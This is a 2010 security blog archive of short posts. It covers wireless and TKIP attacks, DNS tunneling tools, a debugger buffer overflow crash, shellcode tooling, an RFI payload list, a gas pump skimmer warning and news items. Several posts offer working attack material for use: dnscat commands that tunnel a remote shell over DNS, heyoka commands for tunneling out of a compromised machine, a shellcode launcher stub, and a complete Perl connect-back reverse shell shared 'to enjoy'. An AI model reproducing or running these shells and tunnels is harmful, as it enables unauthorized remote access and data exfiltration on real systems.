Sunday, February 28, 2010

Enhanced TKIP Michael Attacks

Hey folks,
today my suggested reading is "Enhanced TKIP Michael Attacks" (PDF).


Abstrac:

In this paper, new attacks against TKIP based IEEE 802.11 networks are described. Using the known Beck-Tews attack, we de ne schemas to continuously generate new keystreams, which allow more and longer packet to be injected. Also an attack against the Michael message integrity code is presented, that allows an attacker to reset the internal MIC state and building on top of that, concatenating a known message with an unknown message keeping the unknown MIC valid for the new entire packet. Based on this, a schema to decrypt all tra c towards the client is described.

Friday, February 26, 2010

KeyKeriki: Universal Wireless Sniffing

Today it's time of KeyKeriki, an awesome project for wireless keyboard analysis. Written by Remote-Exploit folks, KeyKeriki utilizes an open source hardware to capture wireless keyboard waves.

Here the proof:




About the hardware: Keykeriki is build around the Texas Instruments TRF7900 chip controlled by an ATMEL ATMEGA 8-bit microcontroller. For logging abilities, an SDCard interface is built into the board layout, as well as an additional USART channel for future hardware extensions, that we'd like to call "backpacks". The whole board can be powered directly via the USB bus or a stable 5V power source. Keykeriki is not USB certified :-).When connected to a USB port, one can use either a decent terminal application or the keyctrl software which is part of included in the software package of this project. One can download all the schematics in Eagle and PDF format as part of the projects software package. The following interfaces are available on the board:

Mini-B USB connector (USB to serial + power supply)
SDCard slot
External Antenna Connector
USART connector for Backpacks




About the Software: Because of the flexible hardware design, most features are built within software. We wanted to provide more than just decoding of the collected data in this initial release, and we have. Please see the following feature list:
Radio frequency channel switching
Signal strenght (RSSI) display
Data logging to SDCard
Dumping content of SDCard to terminal
Encryption key handling
On-the-fly deciphering of Microsoft's XOR based encryption
Hardware signal filter state configuration
Feature state configuration incl. persistent storage
Activation and usage of backpack USART interface
Sniffing and decoding of keystrokes of Microsoft 27Mhz based keyboards



Yet, another mazing project from remote-exploit folks. Now, anybody knows how to interfacing ARDUINO with TI TRF7900 Texas Instruments ? Are there some boards for that ? I strongly believe that an ARUDINO based hardware would be a great solution to spread you awesome project all around the world, allowing ARDUNIO developers (like me) to upgrade and to expand KeyKeriki . What do you think folks ?

Thursday, February 25, 2010

DNSCAT. Really Awesome

Hi folks,
today I wanna point out DNSCAT. Man in the Middle through DNS is not a new attack, in fact ettercap-ng does this attack from years, but DNSCAT is totally another music. Like NetCAT or NCat, DNSCAT allows direct communication between client and server. You can use it to exchange files, to send string os even to bind a reverse shell ;). To know something more:
Communicating by DNS is great because the client only needs the ability to talk to a single DNS server, any DNS server on the Internet (with recursion enabled). dnscat will, by default, use the system DNS server, which should cover basically every case. Firewalls aren't going to stop you from talking to your local DNS server, right? And I don't know about the average network, but on ours there are thousands of DNS queries every minute, so a little bit of extra traffic just gets lost in the flow.

In brief, dnscat works by taking advantage of DNS recursion. It sends messages to the authoritative nameserver for a domain, which is the key -- to be a server, you have to be the authoritative nameserver for a domain. For example, I'm the authoritative server for skullseclabs.org, so any requests that end with .skullseclabs.org, no matter where they originate, will eventually connect to 208.81.2.52 (my current address).
Example: Remote shell.

Typically, to tunnel a shell over DNS, you're going to want to run a standard server as before:

dnscat --listen

And run the shell on the client side:

Linux/BSD:
dnscat --domain skullseclabs.org --exec "/bin/sh"
Windows:
dnscat.exe --domain skullseclabs.org --exec "cmd.exe"

On the server, you can now type commands and they'll run on the client side.

Download from mirror (RS), Home Page DNSCAT

Thank you RON, this is really awesome. Now ... how has enough time to write a Metasploit plugin ?

Tuesday, February 23, 2010

Olly Debugger: long file extension Buffer Overflow

Hi Folks,
today I found this very interesting post, where basically the author describes how Olly DB and Immunity are affected of his bug. Let's try an example: let's debug a copy of notepad.exe.

1) First of all rename the notepad as a long extension like this one.

notepad.AAAAAAAAAAAAAAAAAAAAAAAAAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA

2) Load the PE into OllyDB and here we go (Access violation) :

(758.268): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=6d5117d4 edx=41414141 esi=01fca1e0 edi=0202fee0
eip=42424242 esp=0012ac8c ebp=41414141 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
42424242 ?? ???

2) Let's see the post-mortem debug:

0:000> d esp
0012ac8c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012ac9c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012acac 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012acbc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012accc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012acdc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012acec 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012acfc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA

All right, we own ESP ! :D

Monday, February 22, 2010

Rocklin Gas Pumps - HACKED !


Hey Folks do you remember my old post on "How to hack ATM and " today some people just realized that these techniques can be applied also to Gas Pumps :) . Here the SacBee article.
So Guys, pay attention where you are going to put your Debit and/or Credit card.
What to check ?

1) Check the card reader. It must be fixed on the body machine. No screws, bolts or glue.
2) Check the integrity. How easy is it to disassembly just one piece of the machine ?
3) Check if there are some micro cameras on the top of the machine. Usually attackers put micro camera to read code on the "roof" of the machine. Micro camera are very small watch out carefully.
4) Keyboard. Check the keyboard. It must be intact. Try to figure out how to disassembly it. Is it easy to disassembly ?

Especially if you live in Northern California, watch out where are you putting your plastic.

Saturday, February 20, 2010

DNS Tunneling: never so easy


Hi folks, today I tried for my first time HeYoKa. As you probably know utilizing Linux systems is pretty easy to build a DNS tunneling , faking up most of the captive portal around the globe, but what about windows ? Well, HeYoKa makes it easy.

Heyoka is a DNS tunneling tool aiming for both performance and stealth, released under the GPLv2.

The tunnel is up to 60% faster compared to existing tools, thanks to a different encoding that is used in the packets. Additionally, heyoka can spread traffic across multiple name servers and spoof the source addresses of other hosts within the network. This way, the traffic signature gets spread across the whole internal network, making the tunnel endpoint significantly harder to spot.

Heyoka is 100% written in C, which means that it runs natively without the need of interpreters installed on the machine, which is extremely useful in a penetration testing scenario.

The overall idea is to create a useful tunneling tool, and at the same time investigate new patterns of data exfiltration that use spoofed packets to avoid detection.

We presented heyoka at multiple conferences. Have a look at the slides from Shakacon if you want to get a bigger picture ... or just download and try! :)

How do I get heyoka to run?

Start by running heyoka in master mode on the machine which is authoritative name server for the domain you are using. Assuming that you are going to contact some service listening on the other side (e.g.: RDP), the syntax will be as follows:

heyoka.exe -m -d mydomain.com -l -p 8080

This will start the fake DNS server, and create a local listening TCP socket on port 8080. Then start heyoka in slave mode on the internal/compromised machine with the following syntax:

heyoka.exe -s -d mydomain.com -p 3389

This will create the tunnel, and all you have to do is to fire off a RDP client and point it to the 'master' machine on port 8080.

If it's the internal/compromised machine that needs to contact a service on the external box, simply use '-l' (which stands for 'listen') on the master side instead. Keep in mind that the code is in alpha stage, so you might experience crashes and other unexpected behavior.



Spotthevuln a nice way to learn security.

Spotthevuln.com was designed to give developers more insight into designing code with security in mind.

When developers write source code they rarely think about security.

After insecure code is deployed, one of two things can happen.

  1. The bug can be found, in which case the developers have to waste development time in order to rewrite their solutions.
  2. The vulnerability is exploited, and the organization loses money, consumer trust, and can gain a negative reputation to their brand.

These problems can be avoided if the developers wrote the code correctly (securely) the first time.

Spotthevuln.com can aid developers, development managers, and QA staff by helping them sharpen their skills in spotting vulnerabilities in source code.

Spotthevuln.com use actual code snippets from open source applications to demonstrate how often vulnerable pieces of code get deployed into the real world.

The purpose is simple:

  • Every Monday a vulnerable piece of code is posted.
  • Every Friday the solution is posted.

On Monday, look at the piece of the code to see if you can identify what the security vulnerability is. Like everything else being able to spot vulnerable code takes practice.

Doing this exercise should take between 5 and 10 minutes out of your day. Do it while you drink your morning coffee and you will already be on your way to being able to write more secure applications.

The more secure code is, the better off we will all be.

Tuesday, February 16, 2010

Find a Hash: SANS Prototype

Today I found very interesting this new SANS service (still in beta testing).
This service is very similar to Offensive computing one (available here). Probably it should be interesting to see both databases together in one unique service.




This page will search your for a hash in the NIST National Software reference Library for files matching your hash. The NSRL is a collection of hashes of "known" software. If you find a random file on your system, and are not sure if it is part of some software you installed, enter the hash here and see if we find it. The NSRL database may contain software that is considered "bad" in some environments. For example games and steganography software is included, as well as security software like nessus and nmap that is sometimes classified as a "hacking tool". Which software is appropriate for a given environment is a matter of policy.We are using version 2.27 (December 2009). You can search for SHA1 or MD5 hashes. There are no Windows 7 hashes yet. NIST offers a Knoppix bootable CD that can be used to collect hashes. We are interested in adding more sources of hashes and would be interested in your hash collection if you have one to offer. Note: The NIST NSRL database only includes hashes of files from original install media. Currently, no patched versions are included. As a result, your hash may differ if that particular file was patched after the original release.In addition to the NIST database, we also run a test agains the Team Cymru Hash Registry. It covers malware. If a match is found we will post a link to the respective page at Threatexpert.com (only for MD5 hashes right now).

Monday, February 15, 2010

DEBIAN version of DirChex


Finally DirChex becomes Debian friendly !
I often though, why in my backTrack distribution I cannot find DirCheck ? After all it's very useful hack tool. Today I can easily install it, just download the Debian package here, and install it !




Ok for people who don't know what I'm talking about:

RUNDOWN:

DirSnatch will allow you to save two different files. One dumps a web directory list in the full URL format (DirGet tab).

Sooo C:\inetpub\public\index.asp

becomes

http://example.com/public/index.asp

so on and so forth.

The other (DirPut) will dump the web directory with only the directories & sub-directories (still with URL format)so that we can automate the request of testing each directory for a vulnerable PUT permission issue.

Sooo C:\inetpub\public\index.asp

becomes

http://example.com/public/

BENEFIT:


The benefit of the new tab is the following. If you'd like to use Burp Suite or DirChex to test each directory for PUT the format that DirPut lists each directory in is suitable for simply concatenating the URL + "a test file".


MEANING:

When using the DirChex PUT tab you can provide a name of a file you would like to upload to the target Web App's directories, choose the the txt file containing URLs dumped with DirSnatch_v2.1 DirPut and it will do the concatenation and request for you. Voila.


Thursday, February 11, 2010

Shell Code Wrapper

Hi folks,
this is another quick post on this nice service from ShellCode 2 EXE .



Basically it wraps your shellcode in a nice and quick way to execute it. Rather then using a classic launch function like the following one:

shellcodetest.c

char code[] = "bytecode will go here!";

int main(int argc, char **argv)

{

int (*func)();

func = (int (*)()) code;

(int)(*func)();

}


just copy and paste the shellcode from metasploit or from your own one, and here we go... you'll be able to run into Windows machines without any trouble your favorite shell :D. If you don't need Windows PE header you can decide to keep only the byte-code by checking the checkbox in the bottom of the form. This is a very useful tool, thank you SandSprite .

No more EU SWIFT data for US

via HSecurity:


As reported by the BBC and others, today the European Parliament voted to block further US access to SWIFT banking data. Despite intensive US lobbying the motion to block was approved with 378 votes in favor, 196 against and 31 abstentions.

Following 9-11 in 2001 the US had secretly started to analyse European banking data as part of the "War on Terror". The US use of the SWIFT data remained undisclosed until 2006. In November of 2009 European Ministers had passed an interim agreement to continue to allow US anti-terror agencies to access the SWIFT data. Today's veto was due to concerns over civil rights and privacy. Apparently the US has always maintained that their use of the SWIFT data was entirely legal.

Interviewed by the German magazine Spiegel (German language link), Adam Szubin, the US treasury department official in charge of the Terrorist Finance Tracking Program, said that the analysis of the SWIFT banking data had proved useful in finding and breaking up terrorist cells operating in Europe. He warned of serious consequences if Parliament were to block access.

This may well not be the end of the matter because the US is continuing to press for access and a number of prominent European ministers are in favour of a modified form of agreement. Commissioner for Home Affairs, Cecilia Malmström stated that "I remain convinced that the programme enhances the security of our citizens," and that "Following today's vote in the European Parliament, we will have now to reflect together with our US partners on the possible negotiation of a new agreement".

Wednesday, February 10, 2010

Shell Code Generator

Today I wanna write a little shell code generator useful for embedding and coding shellcodes. Of course you may find more interesting this one (well-known shellcode generator), the following generator written in perl, is a very basic idea of what a shellcode generator does. Feel free to keep and to modify it.


#!/usr/bin/perl

# shellcode generator

print "shellcode: ";

$x1=<>;

my $data = "$x1";

chomp($data);

my @values = split(undef,$data);


foreach my $val (@values) {


chomp($val);

print '\x';

print unpack(H8,"$val");


}


print "\n";

exit 0;

Tuesday, February 9, 2010

Still Working On RoboAdmin GUI

Hey folks,
this will be a review and RA week, not really more ( well... :P ). I have several papers to review for 3 different IEEE conferences, I am going to spend all my week doing reviews. Probably next week we' ll come out with another version of RA (http://roboadmin.sourcefoge.net), with a nice Graphic User Interface to manage all the meeting points like Skype, IRC, MSN ecc... During last mouths I received some emails regarding the in-usability of RoboAdmin and, you guys were right, RA is a very complicate tool. Is a really good idea to manage your secret server, but still very complicated to setup. I hope the new Graphic user interface will help you to use and to spread it. We're always looking for beta-testers.



Sunday, February 7, 2010

Features VS Bugs


Another fast post just to remember that features always hide bugs.


Saturday, February 6, 2010

Connect Back Shell

Hi folks,
this morning I just wanna share this pretty perl script. It's a back connections shell. Works great and is very easy to modify. Hope you will enjoy it !


#!/usr/bin/perl


use Socket;


$host = $ARGV[0];

$port = $ARGV[1];


if (!$ARGV[0]) {

printf "[!] Usage: perl script.pl \n";

exit(1);

}

print "[+] Connecting to $host\n";

$prot = getprotobyname('tcp'); # You can change this if needs be

socket(SERVER, PF_INET, SOCK_STREAM, $prot) || die ("[-] Unable to Connect !");

if (!connect(SERVER, pack "SnA4x8", 2, $port, inet_aton($host))) {die("[-] Unable to Connect !");}

open(STDIN,">&SERVER");

open(STDOUT,">&SERVER");

open(STDERR,">&SERVER");

exec {'/bin/sh'} '-bash' . "\0" x 4;


Tuesday, February 2, 2010

Illinois eVoting Problems






Yes folks, another issues with electronic voting systems.
via FirstElectronicNewspaper

The law Schultz is going to break is one that says she has to rejigger the County's voting machines to warn people they've failed to vote for someone, that is anyone at all, in a race, a common voter practice. Schultz is afraid if she "fixes" the machines, under certain circumstances they could forget all the preceding votes they'd recorded. She said Thursday she's already made them do it in tests."If (the voting machine company) didn't find that, what else didn't they find?" Schultz asked. She's not the only one asking it. Over half of Illinois counties use the same machines as McHenry County and Clerks have been trying to get the Elections Board to fix the "Fix" for several months. So far their complaints have been either rejected or ignored.

The research community has already defined a way to bound some issues like the previous one. USACM comments on VVSG, USACM comments on STS, and of course NIST white paper: discussion on VVSG claim and discuss about Software Independent Voting devices , where the citizen can directly check their vote and where the software in between cannot compromise the election since the vote has been proven. Unfortunately reality is pretty much different, on my understanding only a voting system design by David Chaum , called ScanTegrity and used in the last Maryland elections has been implemented respecting the Software Independent paradigm. My research group and I, during extra time, are trying to investigate scantegrity voting system (if we will obtain the upgraded sources) checking out the implementation of the Software Independent paradigm and trying to evaluate the security of the system.

Monday, February 1, 2010

RFI List

Hi Folks, today just I wanna point out the RSnake's work on RFI list.
"I started on this project over a year ago, and then I stopped, and then I started it again, and then I stopped again, and finally today, I mostly got it finished (or as far as I’m willing to take it for today). I wanted to create a master list of a mess load of RFI (remote file include) attacks. I got the list from various sources and I’m sure I’m missing a ton so yes, if you think there’s some I’ve missed, go ahead and forward them on to me and I’ll add them in.

You can download the full list here (1002 RFIs at the time of writing).

But because of how I built this it’s got a few issues. The first one is that it doesn’t take into account the path to the vulnerable function. So if it’s http://www.vulnerable.com/bob/something… you have to add that in. The second issue is that sometimes the trailing question mark is needed but it’s not added in the string. But you may require the additional question mark so that you don’t get /r57.txt.somegarbage but rather /r57.txt?.somegarbage which will work. So if you use this, you may have to add in your own question marks after your RFI URL. Anyway, thoughts are welcome, and big thanks for the hundreds of people who found these in the first place! "


Here you can download the whole Remote File Inclusion List. Well, it is a great list... but How can I use this ? Maybe someone has already translated it into something useful ?